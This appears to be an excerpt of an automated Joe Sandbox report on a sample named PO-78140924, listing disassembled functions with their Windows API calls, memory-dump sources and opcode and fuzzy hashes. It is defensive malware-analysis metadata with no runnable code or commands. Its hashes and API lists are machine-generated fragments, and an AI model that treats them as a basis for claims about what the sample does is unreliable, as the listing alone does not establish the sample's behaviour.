                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: LongWindow$DialogNtdllParentProc_
                                                • String ID:
                                                • API String ID: 314495775-0
                                                • Opcode ID: 7f6a8042f39043594f2228b996fb3102a3922509565f02fef34c32bd6b9990ff
                                                • Instruction ID: 75e2cc6acc74deeeb13f01b9266e1d8fb2bbd7b4ac7ef59bff253683bcbbce7c
                                                • Opcode Fuzzy Hash: 7f6a8042f39043594f2228b996fb3102a3922509565f02fef34c32bd6b9990ff
                                                • Instruction Fuzzy Hash: 6321B434209514AFDB648F28DC84EE93BE6AF0A320F544265FB255B3F2CB319D91EB50
                                                Function 0009C5E7 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0004BABA), ref: 0009C65B
                                                  • Part of subcall function 000125DB: GetWindowLongW.USER32(?,000000EB), ref: 000125EC
                                                • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0009C641
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                • String ID:
                                                • API String ID: 1273190321-0
                                                • Opcode ID: 190a61c75b82148b0e34305c8dbf6106b912e3461231bb1fc0b85407c0cd454d
                                                • Instruction ID: 2a398f2a4b2ccda1ea76a287cbc453fc7674aa3b9d5720ae84b75efe5ec576ee
                                                • Opcode Fuzzy Hash: 190a61c75b82148b0e34305c8dbf6106b912e3461231bb1fc0b85407c0cd454d
                                                • Instruction Fuzzy Hash: D601D431201614ABEF215F14DC84FAA3BA6FB89721F140129FD011B2E1CB31AC62EBA0
                                                Function 0009C9A8 Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 0009C9CB
                                                • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0004BB96), ref: 0009C9F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ClientDialogNtdllProc_Screen
                                                • String ID:
                                                • API String ID: 3420055661-0
                                                • Opcode ID: 57890c0fb065f0ea6901dc243711e54afa9d4dae8eb91d6a33515291c5f6519d
                                                • Instruction ID: 558d29647cb896b1f80386e5e154dae5cb96bfa3fa1d42d4d0884c4136f27030
                                                • Opcode Fuzzy Hash: 57890c0fb065f0ea6901dc243711e54afa9d4dae8eb91d6a33515291c5f6519d
                                                • Instruction Fuzzy Hash: 66F01772400218FFEF048F85DC09ABE7BB9FB48311F10416BF901A2161D775AA60EBA0
                                                Function 0007A0F4 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,0008957D,?,0009FB84,?), ref: 0007A121
                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,0008957D,?,0009FB84,?), ref: 0007A133
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ErrorFormatLastMessage
                                                • String ID:
                                                • API String ID: 3479602957-0
                                                • Opcode ID: f38ad73181e36ccc3e086d799f841fe7714d0bcae0e3e8a50a2b19f634f550d5
                                                • Instruction ID: 0150820e645ca514c278f74478e29612b7fe5335dfc63aadaa26279de91d905a
                                                • Opcode Fuzzy Hash: f38ad73181e36ccc3e086d799f841fe7714d0bcae0e3e8a50a2b19f634f550d5
                                                • Instruction Fuzzy Hash: 91F0823560522DBBEB209FA4CC48FEE776CFF09361F008166B909D6191D6349940CBA1
                                                Function 0009CAE6 Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0009CAEE
                                                • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0004BB15), ref: 0009CB1C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogLongNtdllProc_Window
                                                • String ID:
                                                • API String ID: 2065330234-0
                                                • Opcode ID: 6f17092cdbfdcae5584a1e43265d3f9440234dd6d7dd619d637cd87d62c236f5
                                                • Instruction ID: 9b3debc04c07b53fcf7ae5ce2e6cdd117025678658c121839a132c9e4820f4d4
                                                • Opcode Fuzzy Hash: 6f17092cdbfdcae5584a1e43265d3f9440234dd6d7dd619d637cd87d62c236f5
                                                • Instruction Fuzzy Hash: 0DE04F70100215BBFB149F19DC1AFBA3B54F704750F508116F996D90E1C7749850E660
                                                Function 0003A2D5 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00038ED7,?,?,?,00000000), ref: 0003A2DA
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0003A2E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 3fdf307a33189231eb26fdd59bed1c6b758cb9412652bc16f047e60e88381b3e
                                                • Instruction ID: 75b3e4001b922e5c1607e4acdb52673a91a7856ee1554f7384c21f679460f11b
                                                • Opcode Fuzzy Hash: 3fdf307a33189231eb26fdd59bed1c6b758cb9412652bc16f047e60e88381b3e
                                                • Instruction Fuzzy Hash: 46B09B31054209E7D6001B91EC097543F58F744752F408021F50DC4060C7E955904651
                                                Function 0003F359 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73388281d72759e762e283892fe49496baf071407c931507c418bf34fe7dca66
                                                • Instruction ID: 7e13761a6c3bd68515bc477d43e21a4364fd0eb3cd3982a65fa8eda229aeb1c9
                                                • Opcode Fuzzy Hash: 73388281d72759e762e283892fe49496baf071407c931507c418bf34fe7dca66
                                                • Instruction Fuzzy Hash: 4A32F362D29F424DE7639634DC32336A28DAFB73D4F15D737E81AB59A6EB29C4834100
                                                Function 00028968 Relevance: 1.8, Strings: 1, Instructions: 590COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: n
                                                • API String ID: 0-2013832146
                                                • Opcode ID: dacfd9ef750f3800961f2d37cfbfa15b1fe70ec7ea550bd5d969c53461cf75f3
                                                • Instruction ID: 4fa0e94a2831bb16fd7d90281f6962ded35f3fbcbb8d38d4da9fc7ac27dead6c
                                                • Opcode Fuzzy Hash: dacfd9ef750f3800961f2d37cfbfa15b1fe70ec7ea550bd5d969c53461cf75f3
                                                • Instruction Fuzzy Hash: D52248789026268BDF798B18EC9467CB7E2FF01306F68C06EE9469B991DF349D81C741
                                                Function 000425AE Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5711d147cf57b8ec3fafe491d190e4d2120bfeaaba3a1421b35e68c3b6731cb9
                                                • Instruction ID: 9db0f08a8557bf658f59dfc7a9eca70f5e14686bb374cbe6826355f736e338e1
                                                • Opcode Fuzzy Hash: 5711d147cf57b8ec3fafe491d190e4d2120bfeaaba3a1421b35e68c3b6731cb9
                                                • Instruction Fuzzy Hash: 45B11221E2AF404DE76396398831336BB4CAFBB2C5F91D71BFC2674D62EB2585838141
                                                Function 0009D7F6 Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 0009D8A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogLongNtdllProc_Window
                                                • String ID:
                                                • API String ID: 2065330234-0
                                                • Opcode ID: 674cc9bd4840df36b520dfe8b38fe5a54361493c1ec2ff1e9338b0d3e70aa3b7
                                                • Instruction ID: a9ac303399f1126234353bc0c32b5814f785ef1ed502cbd879a827f64197f3d6
                                                • Opcode Fuzzy Hash: 674cc9bd4840df36b520dfe8b38fe5a54361493c1ec2ff1e9338b0d3e70aa3b7
                                                • Instruction Fuzzy Hash: 66112774240215ABFF285E2CDD05FBE3764DB41720F604326F9215A1D3CE649D00B2A4
                                                Function 0009D422 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 000125DB: GetWindowLongW.USER32(?,000000EB), ref: 000125EC
                                                • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0004BAD2), ref: 0009D49C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogLongNtdllProc_Window
                                                • String ID:
                                                • API String ID: 2065330234-0
                                                • Opcode ID: 049646720497adf9a27ebf1e194542e9c16f0e7e87f5e7f23525ffc4f379a9c6
                                                • Instruction ID: 5c53db84a492b17d1b25d1ac583751b6869b22d3567b87d33b126b4652edcc3b
                                                • Opcode Fuzzy Hash: 049646720497adf9a27ebf1e194542e9c16f0e7e87f5e7f23525ffc4f379a9c6
                                                • Instruction Fuzzy Hash: AE01D475640118BBDF149F29D849AFA3BE2EF46361F084126F9595B2A2C731BC60F7A0
                                                Function 0009BF9A Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                  • Part of subcall function 00012344: GetCursorPos.USER32(?), ref: 00012357
                                                  • Part of subcall function 00012344: ScreenToClient.USER32(000D57B0,?), ref: 00012374
                                                  • Part of subcall function 00012344: GetAsyncKeyState.USER32(00000001), ref: 00012399
                                                  • Part of subcall function 00012344: GetAsyncKeyState.USER32(00000002), ref: 000123A7
                                                • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0004BB7F,?,?,?,?,?,00000001), ref: 0009BFEC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                • String ID:
                                                • API String ID: 2356834413-0
                                                • Opcode ID: ebb33503a5fdf4a282e1fec3160fccf56e3a3c7893a5312c8fb74402ab7e03ba
                                                • Instruction ID: e2f6b9bca30312b14cbb31a631b195c52c287156827df0fa5f79dcdd74fe491b
                                                • Opcode Fuzzy Hash: ebb33503a5fdf4a282e1fec3160fccf56e3a3c7893a5312c8fb74402ab7e03ba
                                                • Instruction Fuzzy Hash: 1AF05E34204228ABDF14AE09DC19EBE3B91EB04351F004026F9555B2A2CB75A960EFE0
                                                Function 0001189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?), ref: 000118E2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogLongNtdllProc_Window
                                                • String ID:
                                                • API String ID: 2065330234-0
                                                • Opcode ID: 7b95b98bcd8976ed0726a3a18a6c0c2d955276ab1c150fda167ec38b5760d76b
                                                • Instruction ID: d742a2e418e5bf72be51f23700ba5519b6eba1ed330d08cfc1b044aa0c03dcbb
                                                • Opcode Fuzzy Hash: 7b95b98bcd8976ed0726a3a18a6c0c2d955276ab1c150fda167ec38b5760d76b
                                                • Instruction Fuzzy Hash: DAF03034600615DFDB18DF14DC50AE537E1EB44351F60811AFD514B2A1CB3598A0AB60
                                                Function 0009C928 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0009C968
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogNtdllProc_
                                                • String ID:
                                                • API String ID: 3239928679-0
                                                • Opcode ID: c95f4bef3417d43dbf7d7ca52f9b11765506a8235784cc764f058c35bcb721ba
                                                • Instruction ID: 7d4e29dabfa8e33e2491288d1d7c3e1d6f746ae6341e7abd7b94e86b1c4f566e
                                                • Opcode Fuzzy Hash: c95f4bef3417d43dbf7d7ca52f9b11765506a8235784cc764f058c35bcb721ba
                                                • Instruction Fuzzy Hash: 36F06D31201795AFEF21DF58EC05FD63B95EB09321F148019BE15672E2CB747920E7A0
                                                Function 0001167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 000116AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: DialogLongNtdllProc_Window
                                                • String ID:
                                                • API String ID: 2065330234-0
                                                • Opcode ID: a581bc4786b9e6b0d9275c26215444fda6abecbe0d9f86d2ddebe388e0802e88
                                                • Instruction ID: d67057deedb82243b764113d924b974c81d82bd8ce9ac1dc5bc66c4d76e098c9
                                                • Opcode Fuzzy Hash: a581bc4786b9e6b0d9275c26215444fda6abecbe0d9f86d2ddebe388e0802e88
                                                • Instruction Fuzzy Hash: 3CE0EC35100608FBDF05AF90DC11EA43B26FB48351F608419FA555A2A2CB36A962EB60
                                                Function 0009C973 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,?,?,?,?,?,0004BB3C,?,?), ref: 0009C99E
                                                  • Part of subcall function 0009B669: _memset.LIBCMT ref: 0009B678
                                                  • Part of subcall function 0009B669: _memset.LIBCMT ref: 0009B687
                                                  • Part of subcall function 0009B669: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,000D6F20,000D6F64), ref: 0009B6B6
                                                  • Part of subcall function 0009B669: CloseHandle.KERNEL32 ref: 0009B6C8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
